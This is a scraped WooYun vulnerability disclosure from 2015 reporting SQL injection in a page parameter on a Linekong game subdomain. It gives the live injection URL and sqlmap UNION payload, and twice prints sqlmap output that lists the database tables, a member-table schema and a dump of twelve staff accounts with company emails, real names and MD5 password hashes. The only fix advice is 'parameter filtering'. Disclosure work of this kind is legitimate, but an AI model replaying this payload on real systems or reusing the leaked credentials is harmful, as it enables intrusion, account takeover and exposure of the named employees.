蓝港某分站存在SQL注入 | wooyun-2015-0117071| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0117071

漏洞标题：蓝港某分站存在SQL注入

漏洞作者： hh2014

提交时间：2015-05-30 10:40

修复时间：2015-07-16 11:16

公开时间：2015-07-16 11:16

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-05-30：细节已通知厂商并且等待厂商处理中
2015-06-01：厂商已经确认，细节仅向厂商公开
2015-06-11：细节向核心白帽子及相关领域专家公开
2015-06-21：细节向普通白帽子公开
2015-07-01：细节向实习白帽子公开
2015-07-16：细节向公众公开

简要描述：

sql注入，不知道和前面重复没，重复了就忽略吧。
厂商态度不错，嘿嘿。

详细说明：

注入点：

http://xy.linkong.com/activity/date/rank.php?datestr=20100519&pn=-1

参数pn存在sql注入

sqlmap identified the following injection points with a total of 781 HTTP(s) requests:
---
Parameter: pn (GET)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: datestr=20100519&pn=-1' UNION ALL SELECT CONCAT(0x7176716271,0x614a67774b5067747773,0x716b626271),NULL,NULL#
    Vector:  UNION ALL SELECT [QUERY],NULL,NULL#
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
available databases [2]:
[*] information_schema
[*] xy_web
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: pn (GET)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: datestr=20100519&pn=-1' UNION ALL SELECT CONCAT(0x7176716271,0x614a67774b5067747773,0x716b626271),NULL,NULL#
    Vector:  UNION ALL SELECT [QUERY],NULL,NULL#
---
web application technology: Apache
back-end DBMS: MySQL 5
current user:    'xyweb@172.16.9.162'
current user is DBA:    False
available databases [2]:
[*] information_schema
[*] xy_web
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: pn (GET)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: datestr=20100519&pn=-1' UNION ALL SELECT CONCAT(0x7176716271,0x614a67774b5067747773,0x716b626271),NULL,NULL#
    Vector:  UNION ALL SELECT [QUERY],NULL,NULL#
---
web application technology: Apache
back-end DBMS: MySQL 5
current user is DBA:    False
Database: xy_web
[234 tables]
+--------------------------------------------+
| xy_act_oldgame_log                         |
| xy_act_prize_log                           |
| xy_act_prize_log_20131224                  |
| xy_activity_10wan                          |
| xy_activity_10wan_card                     |
| xy_activity_10wan_info                     |
| xy_activity_10wan_info2nd                  |
| xy_activity_10wan_lottery                  |
| xy_activity_20100815                       |
| xy_activity_20100815_info_log              |
| xy_activity_20100815_netpas_code_log       |
| xy_activity_20100815_taobao_invite         |
| xy_activity_20100815_taobao_sales          |
| xy_activity_20100815_taobao_sales_log      |
| xy_activity_2011midautumn_ecard            |
| xy_activity_2011midautumn_items            |
| xy_activity_2011midautumn_userinfo         |
| xy_activity_300wan                         |
| xy_activity_6gift_getlog                   |
| xy_activity_6gift_log                      |
| xy_activity_6gift_sign                     |
| xy_activity_activation_log                 |
| xy_activity_army_draw_log                  |
| xy_activity_army_info                      |
| xy_activity_army_member                    |
| xy_activity_army_vote_log                  |
| xy_activity_armycreate_log                 |
| xy_activity_armygetgift_log                |
| xy_activity_back                           |
| xy_activity_beautyvote_player              |
| xy_activity_beautyvote_voter               |
| xy_activity_blissfulcard_cdkey             |
| xy_activity_blissfulcard_log               |
| xy_activity_brother_activate_log           |
| xy_activity_brother_code_log               |
| xy_activity_bysf_guestbook                 |
| xy_activity_bysf_log                       |
| xy_activity_bysf_passport                  |
| xy_activity_bysf_question                  |
| xy_activity_chit_code                      |
| xy_activity_date                           |
| xy_activity_date_log                       |
| xy_activity_duowanvip_code                 |
| xy_activity_duowanvip_log                  |
| xy_activity_familybattle_army              |
| xy_activity_familybattle_army_back         |
| xy_activity_familybattle_army_prepare      |
| xy_activity_familybattle_army_prepare_back |
| xy_activity_familybattle_armychief         |
| xy_activity_familybattle_armychief_back    |
| xy_activity_familybattle_lottery_log       |
| xy_activity_fenliulottery_log              |
| xy_activity_first_cdkey                    |
| xy_activity_first_cdkey_state              |
| xy_activity_foyuan_cdkey                   |
| xy_activity_foyuan_log                     |
| xy_activity_foyuan_message                 |
| xy_activity_getchit_log                    |
| xy_activity_gg_cdkey                       |
| xy_activity_gg_cdkey_state                 |
| xy_activity_gh_level                       |
| xy_activity_goldeneyes_cdkey               |
| xy_activity_goldeneyes_cdkey_state         |
| xy_activity_goldeneyes_dayinfo             |
| xy_activity_goldeneyes_doublekey           |
| xy_activity_guestbook                      |
| xy_activity_hopewall                       |
| xy_activity_hopewall_bless                 |
| xy_activity_huikui_answer_log              |
| xy_activity_huikui_lottery_log             |
| xy_activity_jh2_log                        |
| xy_activity_jh2_member                     |
| xy_activity_jh2_taobao                     |
| xy_activity_jh2_taobao_log                 |
| xy_activity_jh_log                         |
| xy_activity_jh_member                      |
| xy_activity_jianding_log                   |
| xy_activity_jianmianhui                    |
| xy_activity_jiaozi_log                     |
| xy_activity_joinarmy_log                   |
| xy_activity_journey_cdkey                  |
| xy_activity_journey_cdkey_state            |
| xy_activity_journey_dayinfo                |
| xy_activity_journey_gc                     |
| xy_activity_journey_gc_log                 |
| xy_activity_king_log                       |
| xy_activity_kingbattle_army                |
| xy_activity_kingbattle_army_prepare        |
| xy_activity_kingbattle_armychief           |
| xy_activity_kingbattle_lottery_log         |
| xy_activity_lostself_code_log              |
| xy_activity_lostself_exchange_log          |
| xy_activity_lostself_transfer_log          |
| xy_activity_lover                          |
| xy_activity_lv20_log                       |
| xy_activity_lv20_member                    |
| xy_activity_lv30_log                       |
| xy_activity_lv30_log1                      |
| xy_activity_lv40_card_10                   |
| xy_activity_lv40_card_30                   |
| xy_activity_lv40_log                       |
| xy_activity_lv40_member                    |
| xy_activity_lv60_log1                      |
| xy_activity_makewishes                     |
| xy_activity_makewishes_draw_log            |
| xy_activity_meeting                        |
| xy_activity_name_log                       |
| xy_activity_namegc_log                     |
| xy_activity_neg_player                     |
| xy_activity_neg_voter                      |
| xy_activity_new_act                        |
| xy_activity_newact_itemlog                 |
| xy_activity_newlottery                     |
| xy_activity_newyear_log                    |
| xy_activity_nverguo2                       |
| xy_activity_nverguo_cdkey                  |
| xy_activity_nverguo_log                    |
| xy_activity_old_player                     |
| xy_activity_oldfriends1_gift_log           |
| xy_activity_oldfriends1_verify_inviter     |
| xy_activity_oldfriends_exchange_log        |
| xy_activity_oldfriends_inviter             |
| xy_activity_oldfriends_oldplayer           |
| xy_activity_oldfriends_verify_inviter      |
| xy_activity_opg_card                       |
| xy_activity_opg_log                        |
| xy_activity_opg_turnround_card             |
| xy_activity_opg_turnround_log              |
| xy_activity_opg_user                       |
| xy_activity_package_card                   |
| xy_activity_package_card_log               |
| xy_activity_package_gift_log               |
| xy_activity_pagoda_log                     |
| xy_activity_people_vote_check              |
| xy_activity_people_vote_log                |
| xy_activity_people_vote_man_log            |
| xy_activity_privilege_card                 |
| xy_activity_privilege_log                  |
| xy_activity_qb                             |
| xy_activity_qb2nd                          |
| xy_activity_qb3rd                          |
| xy_activity_qb4th                          |
| xy_activity_qb5th                          |
| xy_activity_qb5th_bak                      |
| xy_activity_qixi                           |
| xy_activity_qmxscj_card                    |
| xy_activity_qmxscj_log                     |
| xy_activity_qqlz                           |
| xy_activity_qqlz_cdkey                     |
| xy_activity_rally_giver                    |
| xy_activity_rally_invitee                  |
| xy_activity_renzheng_log                   |
| xy_activity_rushlevel                      |
| xy_activity_shenlian_cdkey                 |
| xy_activity_shenlian_cdkey_log             |
| xy_activity_song_log                       |
| xy_activity_songfinal_userinfo             |
| xy_activity_songfinal_voteinfo             |
| xy_activity_survey_code                    |
| xy_activity_survey_log                     |
| xy_activity_survey_question                |
| xy_activity_tequan_card                    |
| xy_activity_tequan_log                     |
| xy_activity_vote_log                       |
| xy_activity_vote_query                     |
| xy_activity_welfare_cdkey                  |
| xy_activity_welfare_log                    |
| xy_activity_welfare_message                |
| xy_activity_wudidong_chongji               |
| xy_activity_wudidong_jifen                 |
| xy_activity_xunyou_ge                      |
| xy_activity_xunyou_ge_cdkey                |
| xy_activity_xunyou_log                     |
| xy_activity_xyl                            |
| xy_activity_xyvip_gift_log                 |
| xy_activity_xyvip_log                      |
| xy_activity_zhailing_cdkey                 |
| xy_activity_zhailing_log                   |
| xy_activity_zhanbu                         |
| xy_activity_zhuanpan                       |
| xy_activity_zhuanpan_voucher               |
| xy_activity_zhuanpan_voucher_log           |
| xy_activity_zhufu_bless                    |
| xy_activity_zhufu_log                      |
| xy_activity_zhufu_lottery                  |
| xy_address                                 |
| xy_article                                 |
| xy_article_demo                            |
| xy_article_inserl                          |
| xy_build                                   |
| xy_channel                                 |
| xy_columns                                 |
| xy_comment                                 |
| xy_demo                                    |
| xy_download                                |
| xy_editors_inserl                          |
| xy_flash                                   |
| xy_grading                                 |
| xy_group                                   |
| xy_image                                   |
| xy_image_inserl                            |
| xy_jnh_5173card_log                        |
| xy_jnh_gift                                |
| xy_jnh_gift_log                            |
| xy_jnh_luck                                |
| xy_jnh_luck_log                            |
| xy_jnh_passport_log                        |
| xy_jnh_receive_log                         |
| xy_login_game_history                      |
| xy_lottery_20100209_state                  |
| xy_lottery_count                           |
| xy_lottery_log                             |
| xy_mall_exchange_log                       |
| xy_mall_lottery_log                        |
| xy_member                                  |
| xy_pass_card_list                          |
| xy_pass_card_list_log                      |
| xy_passportstat                            |
| xy_sort                                    |
| xy_special_like_vote                       |
| xy_special_taici_vote                      |
| xy_taobao_voucher                          |
| xy_taobao_voucher_log                      |
| xy_template                                |
| xy_types                                   |
| xy_url                                     |
| xy_url_inserl                              |
| xy_vote                                    |
| xy_vote_inserl                             |
| xy_vote_option                             |
| xy_wj_article                              |
| xy_wj_article_inserl                       |
| xy_wj_image                                |
| xy_wj_image_inserl                         |
+--------------------------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: pn (GET)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: datestr=20100519&pn=-1' UNION ALL SELECT CONCAT(0x7176716271,0x614a67774b5067747773,0x716b626271),NULL,NULL#
    Vector:  UNION ALL SELECT [QUERY],NULL,NULL#
---
web application technology: Apache
back-end DBMS: MySQL 5
current user is DBA:    False
Database: xy_web
Table: xy_member
[26 columns]
+----------------+--------------+
| Column         | Type         |
+----------------+--------------+
| address_id     | int(11)      |
| article_id     | int(11)      |
| group_id       | int(11)      |
| id             | int(11)      |
| image_id       | int(11)      |
| nickname       | varchar(64)  |
| uadd_time      | datetime     |
| url_id         | int(11)      |
| user_age       | date         |
| user_Dreply    | int(11)      |
| user_Dtopic    | int(11)      |
| user_email     | varchar(32)  |
| user_grading   | varchar(64)  |
| user_jointime  | datetime     |
| user_like      | varchar(255) |
| user_movephone | varchar(32)  |
| user_msn       | varchar(128) |
| user_name      | varchar(32)  |
| user_passwd    | varchar(32)  |
| user_perfect   | int(11)      |
| user_qq        | int(11)      |
| user_sex       | int(2)       |
| user_state     | int(2)       |
| user_Treply    | int(11)      |
| user_Ttopic    | int(11)      |
| vote_id        | int(11)      |
+----------------+--------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: pn (GET)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: datestr=20100519&pn=-1' UNION ALL SELECT CONCAT(0x7176716271,0x614a67774b5067747773,0x716b626271),NULL,NULL#
    Vector:  UNION ALL SELECT [QUERY],NULL,NULL#
---
web application technology: Apache
back-end DBMS: MySQL 5
Database: xy_web
Table: xy_member
[12 entries]
+-------------------------+------------+-----------+----------------------------------+
| user_email              | nickname   | user_name | user_passwd                      |
+-------------------------+------------+-----------+----------------------------------+
| shixi@linekong.com      | shixi      | 实习生       | 003be2507cfad94f1efb32fe3fd0d0ec |
| lizhi@linekong.com      | lz         | 李治        | cd9dac6dbb33988a3214e7ba85d272fc |
| liuzhigang@linekong.com | liuzg      | 刘志刚       | 30fed3a8f7747d5b55707b5ebfe4dc77 |
| <blank>                 | tech       | 运维值班工程师   | de61d9913528e5cc7c0668ad72f53730 |
| <blank>                 | sc         | 邵辰        | d54185b71f614c30a396ac4bc44d3269 |
| dongyong@linekong.com   | doyo       | 董勇        | 862f3760ca3293437b53cac01b0ffe29 |
| <blank>                 | ly         | 卢媛        | e728b47751c6555942cb60f97d1e4553 |
| <blank>                 | hqy        | 韩秋莹       | 2f090f77c0d55fdf508e324140050160 |
| <blank>                 | zc         | 张晨        | 89af113d6dd2855f21cabe600370c8f0 |
| <blank>                 | xyjchanpin | 若若        | f5bf48aa40cad7891eb709fcf1fde128 |
| <blank>                 | kf         | 孔飞        | d3789a3f91258fcf605452196e19c21c |
| <blank>                 | fj         | 冯娟        | d320fe2508d6dbbd97efe367e2798408 |
+-------------------------+------------+-----------+----------------------------------+

漏洞证明：

sqlmap identified the following injection points with a total of 781 HTTP(s) requests:
---
Parameter: pn (GET)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: datestr=20100519&pn=-1' UNION ALL SELECT CONCAT(0x7176716271,0x614a67774b5067747773,0x716b626271),NULL,NULL#
    Vector:  UNION ALL SELECT [QUERY],NULL,NULL#
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
available databases [2]:
[*] information_schema
[*] xy_web
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: pn (GET)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: datestr=20100519&pn=-1' UNION ALL SELECT CONCAT(0x7176716271,0x614a67774b5067747773,0x716b626271),NULL,NULL#
    Vector:  UNION ALL SELECT [QUERY],NULL,NULL#
---
web application technology: Apache
back-end DBMS: MySQL 5
current user:    'xyweb@172.16.9.162'
current user is DBA:    False
available databases [2]:
[*] information_schema
[*] xy_web
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: pn (GET)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: datestr=20100519&pn=-1' UNION ALL SELECT CONCAT(0x7176716271,0x614a67774b5067747773,0x716b626271),NULL,NULL#
    Vector:  UNION ALL SELECT [QUERY],NULL,NULL#
---
web application technology: Apache
back-end DBMS: MySQL 5
current user is DBA:    False
Database: xy_web
[234 tables]
+--------------------------------------------+
| xy_act_oldgame_log                         |
| xy_act_prize_log                           |
| xy_act_prize_log_20131224                  |
| xy_activity_10wan                          |
| xy_activity_10wan_card                     |
| xy_activity_10wan_info                     |
| xy_activity_10wan_info2nd                  |
| xy_activity_10wan_lottery                  |
| xy_activity_20100815                       |
| xy_activity_20100815_info_log              |
| xy_activity_20100815_netpas_code_log       |
| xy_activity_20100815_taobao_invite         |
| xy_activity_20100815_taobao_sales          |
| xy_activity_20100815_taobao_sales_log      |
| xy_activity_2011midautumn_ecard            |
| xy_activity_2011midautumn_items            |
| xy_activity_2011midautumn_userinfo         |
| xy_activity_300wan                         |
| xy_activity_6gift_getlog                   |
| xy_activity_6gift_log                      |
| xy_activity_6gift_sign                     |
| xy_activity_activation_log                 |
| xy_activity_army_draw_log                  |
| xy_activity_army_info                      |
| xy_activity_army_member                    |
| xy_activity_army_vote_log                  |
| xy_activity_armycreate_log                 |
| xy_activity_armygetgift_log                |
| xy_activity_back                           |
| xy_activity_beautyvote_player              |
| xy_activity_beautyvote_voter               |
| xy_activity_blissfulcard_cdkey             |
| xy_activity_blissfulcard_log               |
| xy_activity_brother_activate_log           |
| xy_activity_brother_code_log               |
| xy_activity_bysf_guestbook                 |
| xy_activity_bysf_log                       |
| xy_activity_bysf_passport                  |
| xy_activity_bysf_question                  |
| xy_activity_chit_code                      |
| xy_activity_date                           |
| xy_activity_date_log                       |
| xy_activity_duowanvip_code                 |
| xy_activity_duowanvip_log                  |
| xy_activity_familybattle_army              |
| xy_activity_familybattle_army_back         |
| xy_activity_familybattle_army_prepare      |
| xy_activity_familybattle_army_prepare_back |
| xy_activity_familybattle_armychief         |
| xy_activity_familybattle_armychief_back    |
| xy_activity_familybattle_lottery_log       |
| xy_activity_fenliulottery_log              |
| xy_activity_first_cdkey                    |
| xy_activity_first_cdkey_state              |
| xy_activity_foyuan_cdkey                   |
| xy_activity_foyuan_log                     |
| xy_activity_foyuan_message                 |
| xy_activity_getchit_log                    |
| xy_activity_gg_cdkey                       |
| xy_activity_gg_cdkey_state                 |
| xy_activity_gh_level                       |
| xy_activity_goldeneyes_cdkey               |
| xy_activity_goldeneyes_cdkey_state         |
| xy_activity_goldeneyes_dayinfo             |
| xy_activity_goldeneyes_doublekey           |
| xy_activity_guestbook                      |
| xy_activity_hopewall                       |
| xy_activity_hopewall_bless                 |
| xy_activity_huikui_answer_log              |
| xy_activity_huikui_lottery_log             |
| xy_activity_jh2_log                        |
| xy_activity_jh2_member                     |
| xy_activity_jh2_taobao                     |
| xy_activity_jh2_taobao_log                 |
| xy_activity_jh_log                         |
| xy_activity_jh_member                      |
| xy_activity_jianding_log                   |
| xy_activity_jianmianhui                    |
| xy_activity_jiaozi_log                     |
| xy_activity_joinarmy_log                   |
| xy_activity_journey_cdkey                  |
| xy_activity_journey_cdkey_state            |
| xy_activity_journey_dayinfo                |
| xy_activity_journey_gc                     |
| xy_activity_journey_gc_log                 |
| xy_activity_king_log                       |
| xy_activity_kingbattle_army                |
| xy_activity_kingbattle_army_prepare        |
| xy_activity_kingbattle_armychief           |
| xy_activity_kingbattle_lottery_log         |
| xy_activity_lostself_code_log              |
| xy_activity_lostself_exchange_log          |
| xy_activity_lostself_transfer_log          |
| xy_activity_lover                          |
| xy_activity_lv20_log                       |
| xy_activity_lv20_member                    |
| xy_activity_lv30_log                       |
| xy_activity_lv30_log1                      |
| xy_activity_lv40_card_10                   |
| xy_activity_lv40_card_30                   |
| xy_activity_lv40_log                       |
| xy_activity_lv40_member                    |
| xy_activity_lv60_log1                      |
| xy_activity_makewishes                     |
| xy_activity_makewishes_draw_log            |
| xy_activity_meeting                        |
| xy_activity_name_log                       |
| xy_activity_namegc_log                     |
| xy_activity_neg_player                     |
| xy_activity_neg_voter                      |
| xy_activity_new_act                        |
| xy_activity_newact_itemlog                 |
| xy_activity_newlottery                     |
| xy_activity_newyear_log                    |
| xy_activity_nverguo2                       |
| xy_activity_nverguo_cdkey                  |
| xy_activity_nverguo_log                    |
| xy_activity_old_player                     |
| xy_activity_oldfriends1_gift_log           |
| xy_activity_oldfriends1_verify_inviter     |
| xy_activity_oldfriends_exchange_log        |
| xy_activity_oldfriends_inviter             |
| xy_activity_oldfriends_oldplayer           |
| xy_activity_oldfriends_verify_inviter      |
| xy_activity_opg_card                       |
| xy_activity_opg_log                        |
| xy_activity_opg_turnround_card             |
| xy_activity_opg_turnround_log              |
| xy_activity_opg_user                       |
| xy_activity_package_card                   |
| xy_activity_package_card_log               |
| xy_activity_package_gift_log               |
| xy_activity_pagoda_log                     |
| xy_activity_people_vote_check              |
| xy_activity_people_vote_log                |
| xy_activity_people_vote_man_log            |
| xy_activity_privilege_card                 |
| xy_activity_privilege_log                  |
| xy_activity_qb                             |
| xy_activity_qb2nd                          |
| xy_activity_qb3rd                          |
| xy_activity_qb4th                          |
| xy_activity_qb5th                          |
| xy_activity_qb5th_bak                      |
| xy_activity_qixi                           |
| xy_activity_qmxscj_card                    |
| xy_activity_qmxscj_log                     |
| xy_activity_qqlz                           |
| xy_activity_qqlz_cdkey                     |
| xy_activity_rally_giver                    |
| xy_activity_rally_invitee                  |
| xy_activity_renzheng_log                   |
| xy_activity_rushlevel                      |
| xy_activity_shenlian_cdkey                 |
| xy_activity_shenlian_cdkey_log             |
| xy_activity_song_log                       |
| xy_activity_songfinal_userinfo             |
| xy_activity_songfinal_voteinfo             |
| xy_activity_survey_code                    |
| xy_activity_survey_log                     |
| xy_activity_survey_question                |
| xy_activity_tequan_card                    |
| xy_activity_tequan_log                     |
| xy_activity_vote_log                       |
| xy_activity_vote_query                     |
| xy_activity_welfare_cdkey                  |
| xy_activity_welfare_log                    |
| xy_activity_welfare_message                |
| xy_activity_wudidong_chongji               |
| xy_activity_wudidong_jifen                 |
| xy_activity_xunyou_ge                      |
| xy_activity_xunyou_ge_cdkey                |
| xy_activity_xunyou_log                     |
| xy_activity_xyl                            |
| xy_activity_xyvip_gift_log                 |
| xy_activity_xyvip_log                      |
| xy_activity_zhailing_cdkey                 |
| xy_activity_zhailing_log                   |
| xy_activity_zhanbu                         |
| xy_activity_zhuanpan                       |
| xy_activity_zhuanpan_voucher               |
| xy_activity_zhuanpan_voucher_log           |
| xy_activity_zhufu_bless                    |
| xy_activity_zhufu_log                      |
| xy_activity_zhufu_lottery                  |
| xy_address                                 |
| xy_article                                 |
| xy_article_demo                            |
| xy_article_inserl                          |
| xy_build                                   |
| xy_channel                                 |
| xy_columns                                 |
| xy_comment                                 |
| xy_demo                                    |
| xy_download                                |
| xy_editors_inserl                          |
| xy_flash                                   |
| xy_grading                                 |
| xy_group                                   |
| xy_image                                   |
| xy_image_inserl                            |
| xy_jnh_5173card_log                        |
| xy_jnh_gift                                |
| xy_jnh_gift_log                            |
| xy_jnh_luck                                |
| xy_jnh_luck_log                            |
| xy_jnh_passport_log                        |
| xy_jnh_receive_log                         |
| xy_login_game_history                      |
| xy_lottery_20100209_state                  |
| xy_lottery_count                           |
| xy_lottery_log                             |
| xy_mall_exchange_log                       |
| xy_mall_lottery_log                        |
| xy_member                                  |
| xy_pass_card_list                          |
| xy_pass_card_list_log                      |
| xy_passportstat                            |
| xy_sort                                    |
| xy_special_like_vote                       |
| xy_special_taici_vote                      |
| xy_taobao_voucher                          |
| xy_taobao_voucher_log                      |
| xy_template                                |
| xy_types                                   |
| xy_url                                     |
| xy_url_inserl                              |
| xy_vote                                    |
| xy_vote_inserl                             |
| xy_vote_option                             |
| xy_wj_article                              |
| xy_wj_article_inserl                       |
| xy_wj_image                                |
| xy_wj_image_inserl                         |
+--------------------------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: pn (GET)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: datestr=20100519&pn=-1' UNION ALL SELECT CONCAT(0x7176716271,0x614a67774b5067747773,0x716b626271),NULL,NULL#
    Vector:  UNION ALL SELECT [QUERY],NULL,NULL#
---
web application technology: Apache
back-end DBMS: MySQL 5
current user is DBA:    False
Database: xy_web
Table: xy_member
[26 columns]
+----------------+--------------+
| Column         | Type         |
+----------------+--------------+
| address_id     | int(11)      |
| article_id     | int(11)      |
| group_id       | int(11)      |
| id             | int(11)      |
| image_id       | int(11)      |
| nickname       | varchar(64)  |
| uadd_time      | datetime     |
| url_id         | int(11)      |
| user_age       | date         |
| user_Dreply    | int(11)      |
| user_Dtopic    | int(11)      |
| user_email     | varchar(32)  |
| user_grading   | varchar(64)  |
| user_jointime  | datetime     |
| user_like      | varchar(255) |
| user_movephone | varchar(32)  |
| user_msn       | varchar(128) |
| user_name      | varchar(32)  |
| user_passwd    | varchar(32)  |
| user_perfect   | int(11)      |
| user_qq        | int(11)      |
| user_sex       | int(2)       |
| user_state     | int(2)       |
| user_Treply    | int(11)      |
| user_Ttopic    | int(11)      |
| vote_id        | int(11)      |
+----------------+--------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: pn (GET)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: datestr=20100519&pn=-1' UNION ALL SELECT CONCAT(0x7176716271,0x614a67774b5067747773,0x716b626271),NULL,NULL#
    Vector:  UNION ALL SELECT [QUERY],NULL,NULL#
---
web application technology: Apache
back-end DBMS: MySQL 5
Database: xy_web
Table: xy_member
[12 entries]
+-------------------------+------------+-----------+----------------------------------+
| user_email              | nickname   | user_name | user_passwd                      |
+-------------------------+------------+-----------+----------------------------------+
| shixi@linekong.com      | shixi      | 实习生       | 003be2507cfad94f1efb32fe3fd0d0ec |
| lizhi@linekong.com      | lz         | 李治        | cd9dac6dbb33988a3214e7ba85d272fc |
| liuzhigang@linekong.com | liuzg      | 刘志刚       | 30fed3a8f7747d5b55707b5ebfe4dc77 |
| <blank>                 | tech       | 运维值班工程师   | de61d9913528e5cc7c0668ad72f53730 |
| <blank>                 | sc         | 邵辰        | d54185b71f614c30a396ac4bc44d3269 |
| dongyong@linekong.com   | doyo       | 董勇        | 862f3760ca3293437b53cac01b0ffe29 |
| <blank>                 | ly         | 卢媛        | e728b47751c6555942cb60f97d1e4553 |
| <blank>                 | hqy        | 韩秋莹       | 2f090f77c0d55fdf508e324140050160 |
| <blank>                 | zc         | 张晨        | 89af113d6dd2855f21cabe600370c8f0 |
| <blank>                 | xyjchanpin | 若若        | f5bf48aa40cad7891eb709fcf1fde128 |
| <blank>                 | kf         | 孔飞        | d3789a3f91258fcf605452196e19c21c |
| <blank>                 | fj         | 冯娟        | d320fe2508d6dbbd97efe367e2798408 |
+-------------------------+------------+-----------+----------------------------------+

修复方案：

参数过滤

版权声明：转载请注明来源 hh2014@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：11

确认时间：2015-06-01 11:14

厂商回复：

感谢指出的问题，已转交相关人员处理

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0117071

漏洞标题：蓝港某分站存在SQL注入

相关厂商：linekong.com

漏洞作者： hh2014

提交时间：2015-05-30 10:40

修复时间：2015-07-16 11:16

公开时间：2015-07-16 11:16

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 hh2014@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0117071

漏洞标题：蓝港某分站存在SQL注入

相关厂商：linekong.com

漏洞作者： hh2014

提交时间：2015-05-30 10:40

修复时间：2015-07-16 11:16

公开时间：2015-07-16 11:16

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0117071"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 hh2014@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：